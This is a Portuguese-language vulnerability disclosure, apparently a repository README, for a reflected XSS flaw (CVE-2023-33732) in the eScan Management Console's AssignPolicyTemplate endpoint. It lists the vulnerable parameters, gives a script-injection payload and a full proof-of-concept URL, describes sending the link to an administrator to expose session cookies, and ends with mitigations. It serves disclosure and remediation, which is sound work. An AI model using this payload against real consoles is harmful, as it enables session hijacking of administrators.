
A CVE-2023-33732 é uma vulnerabilidade de Cross-Site Scripting (XSS) refletido descoberta no eScan Management Console da Microworld Technologies, versão 14.0.1400.2281.
CVE-2023-33732 é uma vulnerabilidade de Cross-Site Scripting (XSS) Refletido descoberta no Console de Gerenciamento eScan da Microworld Technologies, versão 14.0.1400.2281. A falha existe no formulário de atribuição de Nova Política (endpoint AssignPolicyTemplate) e permite que um atacante remoto, sem autenticação, injete e execute JavaScript arbitrário no navegador de qualquer usuário autenticado que seja induzido a clicar em uma URL maliciosa.
Como a aplicação reflete a entrada fornecida pelo usuário diretamente na resposta HTML sem sanitização adequada ou codificação de saída, um atacante pode roubar cookies de sessão, executar ações em nome da vítima ou redirecionar o usuário para conteúdo malicioso — tudo sem exigir privilégios especiais no servidor.
| Campo | Valor |
|---|---|
| ID do CVE | CVE-2023-33732 |
| Tipo de Vulnerabilidade | Cross-Site Scripting Refletido (XSS) |
| Produto Afetado | Console de Gerenciamento eScan da Microworld Technologies |
| Versão Afetada | 14.0.1400.2281 |
| Endpoint Vulnerável | /ewconsole/ewconsole.dll/AssignPolicyTemplate |
| Parâmetros Vulneráveis | type, txtPolicyType, txtPolicyPath, Deletefileval |
| Vetor de Ataque | Rede (URL maliciosa entregue via phishing, link, etc.) |
| Autenticação Necessária | Nenhuma (a vítima só precisa estar autenticada) |
| Pontuação CVSS | 6.1 (Média) — CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| Reportado Por | Sahil Ojha |
| Data de Divulgação | 30 de maio de 2023 |
| Página do Fornecedor | https://www.escanav.com |
| Link do Software | https://cl.escanav.com/ewconsole.dll |
| Testado Em | Windows |
Cross-Site Scripting (XSS) é uma classe de ataque de injeção em que scripts maliciosos são injetados em páginas da web que, de outra forma, são confiáveis. Na variante refletida, o payload é embutido em uma URL maliciosa e imediatamente "refletido" de volta ao usuário na resposta HTTP do servidor. O navegador da vítima executa o script no contexto do site vulnerável, concedendo ao script o mesmo nível de confiança que o conteúdo legítimo da página.
As consequências comuns incluem:
O endpoint AssignPolicyTemplate no console de gerenciamento do eScan aceita vários parâmetros GET e os renderiza dentro de uma página HTML sem sanitizar caracteres especiais como ", < e >. Isso significa que um valor como:
"><script>alert(document.cookie)</script>
sai do contexto do atributo HTML circundante e injeta uma tag <script> totalmente executável no DOM.
| Parâmetro | Local | Observações |
|---|---|---|
type | Query string da URL | Sai das aspas do atributo |
txtPolicyType | Query string da URL | Refletido sem sanitização no corpo da página |
txtPolicyPath | Query string da URL | Refletido sem sanitização no corpo da página |
Deletefileval | Query string da URL | Refletido sem sanitização no corpo da página |
⚠️ Apenas para fins educacionais e de testes autorizados.
Autentique-se — Faça login no Console de Gerenciamento do eScan com credenciais válidas.
Crie a URL maliciosa — A URL a seguir explora o parâmetro type para injetar uma tag <script> que exfiltra o cookie de sessão da vítima:
https://<target-host>/ewconsole/ewconsole.dll/AssignPolicyTemplate?type=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&edit=0&txtPolicyType=&txtPolicyPath=!!!!%24%5CPolicies&Deletefileval=Roaming%20Users_Policy2&defaultpolicy=1
Payload decodificado da URL em type:
"><script>alert(document.cookie)</script>
Entregue a URL — Envie o link malicioso para um administrador autenticado (por exemplo, via e-mail ou chat).
Observe a execução — Ao visitar a URL, o navegador executa o script injetado. Uma caixa de diálogo de alerta exibe o cookie de sessão atual, confirmando a execução arbitrária de JavaScript.
Passo 1 — Navegando até a URL vulnerável:

Passo 2 — Popup de alerta de XSS com cookie de sessão:

Passo 3 — Cookie de administrador exposto, pronto para sequestro de sessão:

Um atacante que explore com sucesso esta vulnerabilidade pode:
A Microworld Technologies deve aplicar as seguintes mitigações:
<, >, ", ' e & como suas entidades HTML equivalentes. Observe que a estratégia de codificação difere conforme o contexto: corpo HTML, atributos HTML, JavaScript e URLs exigem regras de codificação próprias.script-src 'self') para impedir a execução de scripts inline mesmo que um payload de XSS seja injetado.Este repositório é publicado apenas para fins educacionais e de divulgação responsável. As informações de prova de conceito fornecidas aqui não devem ser usadas para atacar sistemas sem permissão explícita por escrito do proprietário do sistema. O autor não assume responsabilidade por qualquer uso indevido das informações contidas neste documento.